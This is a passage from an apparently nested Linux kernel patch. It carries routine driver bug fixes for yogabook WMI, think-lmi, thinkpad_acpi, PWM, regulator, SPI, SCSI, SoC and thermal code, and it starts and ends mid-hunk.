++	INIT_WORK(&data->work, yogabook_wmi_work);
+ 
+ 	data->kbd_adev = acpi_dev_get_first_match_dev("GDIX1001", NULL, -1);
+ 	if (!data->kbd_adev) {
+@@ -299,10 +295,12 @@ static int yogabook_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	}
+ 	data->backside_hall_irq = r;
+ 
+-	r = devm_request_irq(&wdev->dev, data->backside_hall_irq,
+-			     yogabook_backside_hall_irq,
+-			     IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING,
+-			     "backside_hall_sw", data);
++	/* Set default brightness before enabling the IRQ */
++	yogabook_wmi_set_kbd_backlight(data->wdev, YB_KBD_BL_DEFAULT);
++
++	r = request_irq(data->backside_hall_irq, yogabook_backside_hall_irq,
++			IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING,
++			"backside_hall_sw", data);
+ 	if (r) {
+ 		dev_err_probe(&wdev->dev, r, "Requesting backside_hall_sw IRQ\n");
+ 		goto error_put_devs;
+@@ -318,11 +316,14 @@ static int yogabook_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	r = devm_led_classdev_register(&wdev->dev, &data->kbd_bl_led);
+ 	if (r < 0) {
+ 		dev_err_probe(&wdev->dev, r, "Registering backlight LED device\n");
+-		goto error_put_devs;
++		goto error_free_irq;
+ 	}
+ 
+ 	return 0;
+ 
++error_free_irq:
++	free_irq(data->backside_hall_irq, data);
++	cancel_work_sync(&data->work);
+ error_put_devs:
+ 	put_device(data->dig_dev);
+ 	put_device(data->kbd_dev);
+@@ -334,6 +335,19 @@ error_put_devs:
+ static void yogabook_wmi_remove(struct wmi_device *wdev)
+ {
+ 	struct yogabook_wmi *data = dev_get_drvdata(&wdev->dev);
++	int r = 0;
++
++	free_irq(data->backside_hall_irq, data);
++	cancel_work_sync(&data->work);
++
++	if (!test_bit(YB_KBD_IS_ON, &data->flags))
++		r |= device_reprobe(data->kbd_dev);
++
++	if (!test_bit(YB_DIGITIZER_IS_ON, &data->flags))
++		r |= device_reprobe(data->dig_dev);
++
++	if (r)
++		dev_warn(&wdev->dev, "Reprobe of devices failed\n");
+ 
+ 	put_device(data->dig_dev);
+ 	put_device(data->kbd_dev);
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index 336b9029d1515..3cbb92b6c5215 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -14,6 +14,7 @@
+ #include <linux/acpi.h>
+ #include <linux/errno.h>
+ #include <linux/fs.h>
++#include <linux/mutex.h>
+ #include <linux/string.h>
+ #include <linux/types.h>
+ #include <linux/dmi.h>
+@@ -171,7 +172,7 @@ MODULE_PARM_DESC(debug_support, "Enable debug command support");
+ #define TLMI_POP_PWD (1 << 0)
+ #define TLMI_PAP_PWD (1 << 1)
+ #define TLMI_HDD_PWD (1 << 2)
+-#define TLMI_SYS_PWD (1 << 3)
++#define TLMI_SMP_PWD (1 << 6) /* System Management */
+ #define TLMI_CERT    (1 << 7)
+ 
+ #define to_tlmi_pwd_setting(kobj)  container_of(kobj, struct tlmi_pwd_setting, kobj)
+@@ -195,6 +196,7 @@ static const char * const level_options[] = {
+ };
+ static struct think_lmi tlmi_priv;
+ static struct class *fw_attr_class;
++static DEFINE_MUTEX(tlmi_mutex);
+ 
+ /* ------ Utility functions ------------*/
+ /* Strip out CR if one is present */
+@@ -437,6 +439,9 @@ static ssize_t new_password_store(struct kobject *kobj,
+ 	/* Strip out CR if one is present, setting password won't work if it is present */
+ 	strip_cr(new_pwd);
+ 
++	/* Use lock in case multiple WMI operations needed */
++	mutex_lock(&tlmi_mutex);
++
+ 	pwdlen = strlen(new_pwd);
+ 	/* pwdlen == 0 is allowed to clear the password */
+ 	if (pwdlen && ((pwdlen < setting->minlen) || (pwdlen > setting->maxlen))) {
+@@ -456,9 +461,9 @@ static ssize_t new_password_store(struct kobject *kobj,
+ 				sprintf(pwd_type, "mhdp%d", setting->index);
+ 		} else if (setting == tlmi_priv.pwd_nvme) {
+ 			if (setting->level == TLMI_LEVEL_USER)
+-				sprintf(pwd_type, "unvp%d", setting->index);
++				sprintf(pwd_type, "udrp%d", setting->index);
+ 			else
+-				sprintf(pwd_type, "mnvp%d", setting->index);
++				sprintf(pwd_type, "adrp%d", setting->index);
+ 		} else {
+ 			sprintf(pwd_type, "%s", setting->pwd_type);
+ 		}
+@@ -493,6 +498,7 @@ static ssize_t new_password_store(struct kobject *kobj,
+ 		kfree(auth_str);
+ 	}
+ out:
++	mutex_unlock(&tlmi_mutex);
+ 	kfree(new_pwd);
+ 	return ret ?: count;
+ }
+@@ -982,6 +988,9 @@ static ssize_t current_value_store(struct kobject *kobj,
+ 	/* Strip out CR if one is present */
+ 	strip_cr(new_setting);
+ 
++	/* Use lock in case multiple WMI operations needed */
++	mutex_lock(&tlmi_mutex);
++
+ 	/* Check if certificate authentication is enabled and active */
+ 	if (tlmi_priv.certificate_support && tlmi_priv.pwd_admin->cert_installed) {
+ 		if (!tlmi_priv.pwd_admin->signature || !tlmi_priv.pwd_admin->save_signature) {
+@@ -1040,6 +1049,7 @@ static ssize_t current_value_store(struct kobject *kobj,
+ 		kobject_uevent(&tlmi_priv.class_dev->kobj, KOBJ_CHANGE);
+ 	}
+ out:
++	mutex_unlock(&tlmi_mutex);
+ 	kfree(auth_str);
+ 	kfree(set_str);
+ 	kfree(new_setting);
+@@ -1512,11 +1522,11 @@ static int tlmi_analyze(void)
+ 		tlmi_priv.pwd_power->valid = true;
+ 
+ 	if (tlmi_priv.opcode_support) {
+-		tlmi_priv.pwd_system = tlmi_create_auth("sys", "system");
++		tlmi_priv.pwd_system = tlmi_create_auth("smp", "system");
+ 		if (!tlmi_priv.pwd_system)
+ 			goto fail_clear_attr;
+ 
+-		if (tlmi_priv.pwdcfg.core.password_state & TLMI_SYS_PWD)
++		if (tlmi_priv.pwdcfg.core.password_state & TLMI_SMP_PWD)
+ 			tlmi_priv.pwd_system->valid = true;
+ 
+ 		tlmi_priv.pwd_hdd = tlmi_create_auth("hdd", "hdd");
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 5b2c8dd2861b7..e7ece2738de94 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10528,8 +10528,8 @@ unlock:
+ static void dytc_profile_refresh(void)
+ {
+ 	enum platform_profile_option profile;
+-	int output, err = 0;
+-	int perfmode, funcmode;
++	int output = 0, err = 0;
++	int perfmode, funcmode = 0;
+ 
+ 	mutex_lock(&dytc_mutex);
+ 	if (dytc_capabilities & BIT(DYTC_FC_MMC)) {
+@@ -10542,6 +10542,8 @@ static void dytc_profile_refresh(void)
+ 		err = dytc_command(DYTC_CMD_GET, &output);
+ 		/* Check if we are PSC mode, or have AMT enabled */
+ 		funcmode = (output >> DYTC_GET_FUNCTION_BIT) & 0xF;
++	} else { /* Unknown profile mode */
++		err = -ENODEV;
+ 	}
+ 	mutex_unlock(&dytc_mutex);
+ 	if (err)
+diff --git a/drivers/powercap/Kconfig b/drivers/powercap/Kconfig
+index 515e3ceb3393a..863e240b37e01 100644
+--- a/drivers/powercap/Kconfig
++++ b/drivers/powercap/Kconfig
+@@ -18,10 +18,12 @@ if POWERCAP
+ # Client driver configurations go here.
+ config INTEL_RAPL_CORE
+ 	tristate
++	depends on PCI
++	select IOSF_MBI
+ 
+ config INTEL_RAPL
+ 	tristate "Intel RAPL Support via MSR Interface"
+-	depends on X86 && IOSF_MBI
++	depends on X86 && PCI
+ 	select INTEL_RAPL_CORE
+ 	help
+ 	  This enables support for the Intel Running Average Power Limit (RAPL)
+diff --git a/drivers/powercap/intel_rapl_msr.c b/drivers/powercap/intel_rapl_msr.c
+index bc6adda588835..65adb4cbaaf8e 100644
+--- a/drivers/powercap/intel_rapl_msr.c
++++ b/drivers/powercap/intel_rapl_msr.c
+@@ -22,7 +22,6 @@
+ #include <linux/processor.h>
+ #include <linux/platform_device.h>
+ 
+-#include <asm/iosf_mbi.h>
+ #include <asm/cpu_device_id.h>
+ #include <asm/intel-family.h>
+ 
+diff --git a/drivers/pwm/pwm-ab8500.c b/drivers/pwm/pwm-ab8500.c
+index ad37bc46f2721..5fa91f4cda7ac 100644
+--- a/drivers/pwm/pwm-ab8500.c
++++ b/drivers/pwm/pwm-ab8500.c
+@@ -96,7 +96,7 @@ static int ab8500_pwm_probe(struct platform_device *pdev)
+ 	int err;
+ 
+ 	if (pdev->id < 1 || pdev->id > 31)
+-		return dev_err_probe(&pdev->dev, EINVAL, "Invalid device id %d\n", pdev->id);
++		return dev_err_probe(&pdev->dev, -EINVAL, "Invalid device id %d\n", pdev->id);
+ 
+ 	/*
+ 	 * Nothing to be done in probe, this is required to get the
+diff --git a/drivers/pwm/pwm-imx-tpm.c b/drivers/pwm/pwm-imx-tpm.c
+index ed1aad96fff04..318dc0be974b4 100644
+--- a/drivers/pwm/pwm-imx-tpm.c
++++ b/drivers/pwm/pwm-imx-tpm.c
+@@ -399,6 +399,13 @@ static int __maybe_unused pwm_imx_tpm_suspend(struct device *dev)
+ 	if (tpm->enable_count > 0)
+ 		return -EBUSY;
+ 
++	/*
++	 * Force 'real_period' to be zero to force period update code
++	 * can be executed after system resume back, since suspend causes
++	 * the period related registers to become their reset values.
++	 */
++	tpm->real_period = 0;
++
+ 	clk_disable_unprepare(tpm->clk);
+ 
+ 	return 0;
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index 3811578fcff05..db286284f3ee0 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -79,14 +79,11 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (state->polarity != PWM_POLARITY_NORMAL)
+ 		return -EINVAL;
+ 
+-	if (!state->enabled) {
+-		mtk_disp_pwm_update_bits(mdp, DISP_PWM_EN, mdp->data->enable_mask,
+-					 0x0);
+-
+-		if (mdp->enabled) {
+-			clk_disable_unprepare(mdp->clk_mm);
+-			clk_disable_unprepare(mdp->clk_main);
+-		}
++	if (!state->enabled && mdp->enabled) {
++		mtk_disp_pwm_update_bits(mdp, DISP_PWM_EN,
++					 mdp->data->enable_mask, 0x0);
++		clk_disable_unprepare(mdp->clk_mm);
++		clk_disable_unprepare(mdp->clk_main);
+ 
+ 		mdp->enabled = false;
+ 		return 0;
+diff --git a/drivers/pwm/sysfs.c b/drivers/pwm/sysfs.c
+index e7db8e45001cf..ba125253857ea 100644
+--- a/drivers/pwm/sysfs.c
++++ b/drivers/pwm/sysfs.c
+@@ -424,6 +424,13 @@ static int pwm_class_resume_npwm(struct device *parent, unsigned int npwm)
+ 		if (!export)
+ 			continue;
+ 
++		/* If pwmchip was not enabled before suspend, do nothing. */
++		if (!export->suspend.enabled) {
++			/* release lock taken in pwm_class_get_state */
++			mutex_unlock(&export->lock);
++			continue;
++		}
++
+ 		state.enabled = export->suspend.enabled;
+ 		ret = pwm_class_apply_state(export, pwm, &state);
+ 		if (ret < 0)
+@@ -448,7 +455,17 @@ static int pwm_class_suspend(struct device *parent)
+ 		if (!export)
+ 			continue;
+ 
++		/*
++		 * If pwmchip was not enabled before suspend, save
++		 * state for resume time and do nothing else.
++		 */
+ 		export->suspend = state;
++		if (!state.enabled) {
++			/* release lock taken in pwm_class_get_state */
++			mutex_unlock(&export->lock);
++			continue;
++		}
++
+ 		state.enabled = false;
+ 		ret = pwm_class_apply_state(export, pwm, &state);
+ 		if (ret < 0) {
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index e01cade8be0c7..351f0fd225b14 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1918,19 +1918,17 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 
+ 	if (err != -EEXIST)
+ 		regulator->debugfs = debugfs_create_dir(supply_name, rdev->debugfs);
+-	if (!regulator->debugfs) {
++	if (IS_ERR(regulator->debugfs))
+ 		rdev_dbg(rdev, "Failed to create debugfs directory\n");
+-	} else {
+-		debugfs_create_u32("uA_load", 0444, regulator->debugfs,
+-				   &regulator->uA_load);
+-		debugfs_create_u32("min_uV", 0444, regulator->debugfs,
+-				   &regulator->voltage[PM_SUSPEND_ON].min_uV);
+-		debugfs_create_u32("max_uV", 0444, regulator->debugfs,
+-				   &regulator->voltage[PM_SUSPEND_ON].max_uV);
+-		debugfs_create_file("constraint_flags", 0444,
+-				    regulator->debugfs, regulator,
+-				    &constraint_flags_fops);
+-	}
++
++	debugfs_create_u32("uA_load", 0444, regulator->debugfs,
++			   &regulator->uA_load);
++	debugfs_create_u32("min_uV", 0444, regulator->debugfs,
++			   &regulator->voltage[PM_SUSPEND_ON].min_uV);
++	debugfs_create_u32("max_uV", 0444, regulator->debugfs,
++			   &regulator->voltage[PM_SUSPEND_ON].max_uV);
++	debugfs_create_file("constraint_flags", 0444, regulator->debugfs,
++			    regulator, &constraint_flags_fops);
+ 
+ 	/*
+ 	 * Check now if the regulator is an always on regulator - if
+@@ -5257,10 +5255,8 @@ static void rdev_init_debugfs(struct regulator_dev *rdev)
+ 	}
+ 
+ 	rdev->debugfs = debugfs_create_dir(rname, debugfs_root);
+-	if (IS_ERR(rdev->debugfs)) {
+-		rdev_warn(rdev, "Failed to create debugfs directory\n");
+-		return;
+-	}
++	if (IS_ERR(rdev->debugfs))
++		rdev_dbg(rdev, "Failed to create debugfs directory\n");
+ 
+ 	debugfs_create_u32("use_count", 0444, rdev->debugfs,
+ 			   &rdev->use_count);
+@@ -6180,7 +6176,7 @@ static int __init regulator_init(void)
+ 
+ 	debugfs_root = debugfs_create_dir("regulator", NULL);
+ 	if (IS_ERR(debugfs_root))
+-		pr_warn("regulator: Failed to create debugfs directory\n");
++		pr_debug("regulator: Failed to create debugfs directory\n");
+ 
+ #ifdef CONFIG_DEBUG_FS
+ 	debugfs_create_file("supply_map", 0444, debugfs_root, NULL,
+diff --git a/drivers/regulator/tps65219-regulator.c b/drivers/regulator/tps65219-regulator.c
+index 58f6541b6417b..b0d8d6fed24d5 100644
+--- a/drivers/regulator/tps65219-regulator.c
++++ b/drivers/regulator/tps65219-regulator.c
+@@ -289,13 +289,13 @@ static irqreturn_t tps65219_regulator_irq_handler(int irq, void *data)
+ 
+ static int tps65219_get_rdev_by_name(const char *regulator_name,
+ 				     struct regulator_dev *rdevtbl[7],
+-				     struct regulator_dev *dev)
++				     struct regulator_dev **dev)
+ {
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(regulators); i++) {
+ 		if (strcmp(regulator_name, regulators[i].name) == 0) {
+-			dev = rdevtbl[i];
++			*dev = rdevtbl[i];
+ 			return 0;
+ 		}
+ 	}
+@@ -348,7 +348,7 @@ static int tps65219_regulator_probe(struct platform_device *pdev)
+ 		irq_data[i].dev = tps->dev;
+ 		irq_data[i].type = irq_type;
+ 
+-		tps65219_get_rdev_by_name(irq_type->regulator_name, rdevtbl, rdev);
++		tps65219_get_rdev_by_name(irq_type->regulator_name, rdevtbl, &rdev);
+ 		if (IS_ERR(rdev)) {
+ 			dev_err(tps->dev, "Failed to get rdev for %s\n",
+ 				irq_type->regulator_name);
+diff --git a/drivers/rtc/rtc-st-lpc.c b/drivers/rtc/rtc-st-lpc.c
+index 0f8e4231098ef..d04d46f9cc65a 100644
+--- a/drivers/rtc/rtc-st-lpc.c
++++ b/drivers/rtc/rtc-st-lpc.c
+@@ -228,7 +228,7 @@ static int st_rtc_probe(struct platform_device *pdev)
+ 	enable_irq_wake(rtc->irq);
+ 	disable_irq(rtc->irq);
+ 
+-	rtc->clk = clk_get(&pdev->dev, NULL);
++	rtc->clk = devm_clk_get(&pdev->dev, NULL);
+ 	if (IS_ERR(rtc->clk)) {
+ 		dev_err(&pdev->dev, "Unable to request clock\n");
+ 		return PTR_ERR(rtc->clk);
+diff --git a/drivers/s390/net/qeth_l3_sys.c b/drivers/s390/net/qeth_l3_sys.c
+index 1082380b21f85..dba9b307020cb 100644
+--- a/drivers/s390/net/qeth_l3_sys.c
++++ b/drivers/s390/net/qeth_l3_sys.c
+@@ -652,7 +652,7 @@ static QETH_DEVICE_ATTR(vipa_add4, add4, 0644,
+ static ssize_t qeth_l3_dev_vipa_del4_store(struct device *dev,
+ 		struct device_attribute *attr, const char *buf, size_t count)
+ {
+-	return qeth_l3_vipa_store(dev, buf, true, count, QETH_PROT_IPV4);
++	return qeth_l3_vipa_store(dev, buf, false, count, QETH_PROT_IPV4);
+ }
+ 
+ static QETH_DEVICE_ATTR(vipa_del4, del4, 0200, NULL,
+diff --git a/drivers/scsi/3w-xxxx.c b/drivers/scsi/3w-xxxx.c
+index ffdecb12d654c..9bd70e4618d52 100644
+--- a/drivers/scsi/3w-xxxx.c
++++ b/drivers/scsi/3w-xxxx.c
+@@ -2305,8 +2305,10 @@ static int tw_probe(struct pci_dev *pdev, const struct pci_device_id *dev_id)
+ 	TW_DISABLE_INTERRUPTS(tw_dev);
+ 
+ 	/* Initialize the card */
+-	if (tw_reset_sequence(tw_dev))
++	if (tw_reset_sequence(tw_dev)) {
++		retval = -EINVAL;
+ 		goto out_release_mem_region;
++	}
+ 
+ 	/* Set host specific parameters */
+ 	host->max_id = TW_MAX_UNITS;
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index ddd5949d8fc01..e21c73a3803ec 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -5413,9 +5413,19 @@ out:
+ 				ndlp->nlp_flag &= ~NLP_RELEASE_RPI;
+ 				spin_unlock_irq(&ndlp->lock);
+ 			}
++			lpfc_drop_node(vport, ndlp);
++		} else if (ndlp->nlp_state != NLP_STE_PLOGI_ISSUE &&
++			   ndlp->nlp_state != NLP_STE_REG_LOGIN_ISSUE &&
++			   ndlp->nlp_state != NLP_STE_PRLI_ISSUE) {
++			/* Drop ndlp if there is no planned or outstanding
++			 * issued PRLI.
++			 *
++			 * In cases when the ndlp is acting as both an initiator
++			 * and target function, let our issued PRLI determine
++			 * the final ndlp kref drop.
++			 */
++			lpfc_drop_node(vport, ndlp);
+ 		}
+-
+-		lpfc_drop_node(vport, ndlp);
+ 	}
+ 
+ 	/* Release the originating I/O reference. */
+diff --git a/drivers/scsi/qedf/qedf_main.c b/drivers/scsi/qedf/qedf_main.c
+index e045c6e250902..ecff2ec83a002 100644
+--- a/drivers/scsi/qedf/qedf_main.c
++++ b/drivers/scsi/qedf/qedf_main.c
+@@ -3046,9 +3046,8 @@ static int qedf_alloc_global_queues(struct qedf_ctx *qedf)
+ 	 * addresses of our queues
+ 	 */
+ 	if (!qedf->p_cpuq) {
+-		status = -EINVAL;
+ 		QEDF_ERR(&qedf->dbg_ctx, "p_cpuq is NULL.\n");
+-		goto mem_alloc_failure;
++		return -EINVAL;
+ 	}
+ 
+ 	qedf->global_queues = kzalloc((sizeof(struct global_queue *)
+diff --git a/drivers/soc/amlogic/meson-secure-pwrc.c b/drivers/soc/amlogic/meson-secure-pwrc.c
+index e935187635267..25b4b71df9b89 100644
+--- a/drivers/soc/amlogic/meson-secure-pwrc.c
++++ b/drivers/soc/amlogic/meson-secure-pwrc.c
+@@ -105,7 +105,7 @@ static struct meson_secure_pwrc_domain_desc a1_pwrc_domains[] = {
+ 	SEC_PD(ACODEC,	0),
+ 	SEC_PD(AUDIO,	0),
+ 	SEC_PD(OTP,	0),
+-	SEC_PD(DMA,	0),
++	SEC_PD(DMA,	GENPD_FLAG_ALWAYS_ON | GENPD_FLAG_IRQ_SAFE),
+ 	SEC_PD(SD_EMMC,	0),
+ 	SEC_PD(RAMA,	0),
+ 	/* SRAMB is used as ATF runtime memory, and should be always on */
+diff --git a/drivers/soc/fsl/qe/Kconfig b/drivers/soc/fsl/qe/Kconfig
+index 357c5800b112f..7afa796dbbb89 100644
+--- a/drivers/soc/fsl/qe/Kconfig
++++ b/drivers/soc/fsl/qe/Kconfig
+@@ -39,6 +39,7 @@ config QE_TDM
+ 
+ config QE_USB
+ 	bool
++	depends on QUICC_ENGINE
+ 	default y if USB_FSL_QE
+ 	help
+ 	  QE USB Controller support
+diff --git a/drivers/soc/mediatek/mtk-svs.c b/drivers/soc/mediatek/mtk-svs.c
+index e55fb16fdc5ac..f00cd5c723499 100644
+--- a/drivers/soc/mediatek/mtk-svs.c
++++ b/drivers/soc/mediatek/mtk-svs.c
+@@ -2114,9 +2114,9 @@ static int svs_mt8192_platform_probe(struct svs_platform *svsp)
+ 		svsb = &svsp->banks[idx];
+ 
+ 		if (svsb->type == SVSB_HIGH)
+-			svsb->opp_dev = svs_add_device_link(svsp, "mali");
++			svsb->opp_dev = svs_add_device_link(svsp, "gpu");
+ 		else if (svsb->type == SVSB_LOW)
+-			svsb->opp_dev = svs_get_subsys_device(svsp, "mali");
++			svsb->opp_dev = svs_get_subsys_device(svsp, "gpu");
+ 
+ 		if (IS_ERR(svsb->opp_dev))
+ 			return dev_err_probe(svsp->dev, PTR_ERR(svsb->opp_dev),
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index c76381899ef49..f9d9b82b562da 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -192,11 +192,12 @@ static int xlnx_remove_cb_for_suspend(event_cb_func_t cb_fun)
+ 	struct registered_event_data *eve_data;
+ 	struct agent_cb *cb_pos;
+ 	struct agent_cb *cb_next;
++	struct hlist_node *tmp;
+ 
+ 	is_need_to_unregister = false;
+ 
+ 	/* Check for existing entry in hash table for given cb_type */
+-	hash_for_each_possible(reg_driver_map, eve_data, hentry, PM_INIT_SUSPEND_CB) {
++	hash_for_each_possible_safe(reg_driver_map, eve_data, tmp, hentry, PM_INIT_SUSPEND_CB) {
+ 		if (eve_data->cb_type == PM_INIT_SUSPEND_CB) {
+ 			/* Delete the list of callback */
+ 			list_for_each_entry_safe(cb_pos, cb_next, &eve_data->cb_list_head, list) {
+@@ -228,11 +229,12 @@ static int xlnx_remove_cb_for_notify_event(const u32 node_id, const u32 event,
+ 	u64 key = ((u64)node_id << 32U) | (u64)event;
+ 	struct agent_cb *cb_pos;
+ 	struct agent_cb *cb_next;
++	struct hlist_node *tmp;
+ 
+ 	is_need_to_unregister = false;
+ 
+ 	/* Check for existing entry in hash table for given key id */
+-	hash_for_each_possible(reg_driver_map, eve_data, hentry, key) {
++	hash_for_each_possible_safe(reg_driver_map, eve_data, tmp, hentry, key) {
+ 		if (eve_data->key == key) {
+ 			/* Delete the list of callback */
+ 			list_for_each_entry_safe(cb_pos, cb_next, &eve_data->cb_list_head, list) {
+diff --git a/drivers/spi/spi-bcm-qspi.c b/drivers/spi/spi-bcm-qspi.c
+index cad2d55dcd3d2..137e7315a3cfd 100644
+--- a/drivers/spi/spi-bcm-qspi.c
++++ b/drivers/spi/spi-bcm-qspi.c
+@@ -1543,13 +1543,9 @@ int bcm_qspi_probe(struct platform_device *pdev,
+ 		res = platform_get_resource_byname(pdev, IORESOURCE_MEM,
+ 						   "mspi");
+ 
+-	if (res) {
+-		qspi->base[MSPI]  = devm_ioremap_resource(dev, res);
+-		if (IS_ERR(qspi->base[MSPI]))
+-			return PTR_ERR(qspi->base[MSPI]);
+-	} else {
+-		return 0;
+-	}
++	qspi->base[MSPI]  = devm_ioremap_resource(dev, res);
++	if (IS_ERR(qspi->base[MSPI]))
++		return PTR_ERR(qspi->base[MSPI]);
+ 
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "bspi");
+ 	if (res) {
+diff --git a/drivers/spi/spi-dw-core.c b/drivers/spi/spi-dw-core.c
+index c3bfb6c84cab2..4976e3b8923ee 100644
+--- a/drivers/spi/spi-dw-core.c
++++ b/drivers/spi/spi-dw-core.c
+@@ -426,7 +426,10 @@ static int dw_spi_transfer_one(struct spi_controller *master,
+ 	int ret;
+ 
+ 	dws->dma_mapped = 0;
+-	dws->n_bytes = DIV_ROUND_UP(transfer->bits_per_word, BITS_PER_BYTE);
++	dws->n_bytes =
++		roundup_pow_of_two(DIV_ROUND_UP(transfer->bits_per_word,
++						BITS_PER_BYTE));
++
+ 	dws->tx = (void *)transfer->tx_buf;
+ 	dws->tx_len = transfer->len / dws->n_bytes;
+ 	dws->rx = transfer->rx_buf;
+diff --git a/drivers/spi/spi-geni-qcom.c b/drivers/spi/spi-geni-qcom.c
+index dd1581893fe72..7b76dcd11e2bb 100644
+--- a/drivers/spi/spi-geni-qcom.c
++++ b/drivers/spi/spi-geni-qcom.c
+@@ -35,7 +35,7 @@
+ #define CS_DEMUX_OUTPUT_SEL	GENMASK(3, 0)
+ 
+ #define SE_SPI_TRANS_CFG	0x25c
+-#define CS_TOGGLE		BIT(0)
++#define CS_TOGGLE		BIT(1)
+ 
+ #define SE_SPI_WORD_LEN		0x268
+ #define WORD_LEN_MSK		GENMASK(9, 0)
+@@ -979,6 +979,12 @@ static int spi_geni_probe(struct platform_device *pdev)
+ 	if (mas->cur_xfer_mode == GENI_SE_FIFO)
+ 		spi->set_cs = spi_geni_set_cs;
+ 
++	/*
++	 * TX is required per GSI spec, see setup_gsi_xfer().
++	 */
++	if (mas->cur_xfer_mode == GENI_GPI_DMA)
++		spi->flags = SPI_CONTROLLER_MUST_TX;
++
+ 	ret = request_irq(mas->irq, geni_spi_isr, 0, dev_name(dev), spi);
+ 	if (ret)
+ 		goto spi_geni_release_dma;
+diff --git a/drivers/staging/media/atomisp/pci/atomisp_gmin_platform.c b/drivers/staging/media/atomisp/pci/atomisp_gmin_platform.c
+index 3d41fab661cf0..789b13db80b2f 100644
+--- a/drivers/staging/media/atomisp/pci/atomisp_gmin_platform.c
++++ b/drivers/staging/media/atomisp/pci/atomisp_gmin_platform.c
+@@ -1280,7 +1280,7 @@ static int gmin_get_config_dsm_var(struct device *dev,
+ 	dev_info(dev, "found _DSM entry for '%s': %s\n", var,
+ 		 cur->string.pointer);
+ 	strscpy(out, cur->string.pointer, *out_len);
+-	*out_len = strlen(cur->string.pointer);
++	*out_len = strlen(out);
+ 
+ 	ACPI_FREE(obj);
+ 	return 0;
+diff --git a/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.c b/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.c
+index dc33490ba7fbb..705c5e283c27b 100644
+--- a/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.c
++++ b/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.c
+@@ -415,7 +415,7 @@ free_pagelist(struct vchiq_instance *instance, struct vchiq_pagelist_info *pagel
+ 	pagelistinfo->scatterlist_mapped = 0;
+ 
+ 	/* Deal with any partial cache lines (fragments) */
+-	if (pagelist->type >= PAGELIST_READ_WITH_FRAGMENTS) {
++	if (pagelist->type >= PAGELIST_READ_WITH_FRAGMENTS && g_fragments_base) {
+ 		char *fragments = g_fragments_base +
+ 			(pagelist->type - PAGELIST_READ_WITH_FRAGMENTS) *
+ 			g_fragments_size;
+@@ -462,7 +462,7 @@ free_pagelist(struct vchiq_instance *instance, struct vchiq_pagelist_info *pagel
+ 	cleanup_pagelistinfo(instance, pagelistinfo);
+ }
+ 
+-int vchiq_platform_init(struct platform_device *pdev, struct vchiq_state *state)
++static int vchiq_platform_init(struct platform_device *pdev, struct vchiq_state *state)
+ {
+ 	struct device *dev = &pdev->dev;
+ 	struct vchiq_drvdata *drvdata = platform_get_drvdata(pdev);
+diff --git a/drivers/thermal/sun8i_thermal.c b/drivers/thermal/sun8i_thermal.c
+index e64d06d1328ce..80614b6adfac5 100644
+--- a/drivers/thermal/sun8i_thermal.c
++++ b/drivers/thermal/sun8i_thermal.c
+@@ -319,6 +319,11 @@ out:
+ 	return ret;
+ }
+ 
++static void sun8i_ths_reset_control_assert(void *data)
++{
++	reset_control_assert(data);
++}
++
+ static int sun8i_ths_resource_init(struct ths_device *tmdev)
+ {
+ 	struct device *dev = tmdev->dev;
+@@ -339,47 +344,35 @@ static int sun8i_ths_resource_init(struct ths_device *tmdev)
+ 		if (IS_ERR(tmdev->reset))
+ 			return PTR_ERR(tmdev->reset);
+ 
+-		tmdev->bus_clk = devm_clk_get(&pdev->dev, "bus");
++		ret = reset_control_deassert(tmdev->reset);
++		if (ret)
++			return ret;
++
++		ret = devm_add_action_or_reset(dev, sun8i_ths_reset_control_assert,
++					       tmdev->reset);
++		if (ret)
++			return ret;
++
++		tmdev->bus_clk = devm_clk_get_enabled(&pdev->dev, "bus");
+ 		if (IS_ERR(tmdev->bus_clk))
+ 			return PTR_ERR(tmdev->bus_clk);
+ 	}
+ 
+ 	if (tmdev->chip->has_mod_clk) {
+-		tmdev->mod_clk = devm_clk_get(&pdev->dev, "mod");
++		tmdev->mod_clk = devm_clk_get_enabled(&pdev->dev, "mod");
+ 		if (IS_ERR(tmdev->mod_clk))
+ 			return PTR_ERR(tmdev->mod_clk);
+ 	}
+ 
+-	ret = reset_control_deassert(tmdev->reset);
+-	if (ret)
+-		return ret;
+-
+-	ret = clk_prepare_enable(tmdev->bus_clk);
+-	if (ret)
+-		goto assert_reset;
+-
+ 	ret = clk_set_rate(tmdev->mod_clk, 24000000);
+ 	if (ret)
+-		goto bus_disable;
+-
+-	ret = clk_prepare_enable(tmdev->mod_clk);
+-	if (ret)
+-		goto bus_disable;
++		return ret;
+ 
+ 	ret = sun8i_ths_calibrate(tmdev);
+ 	if (ret)
+-		goto mod_disable;
++		return ret;
+ 
+ 	return 0;
+-
+-mod_disable:
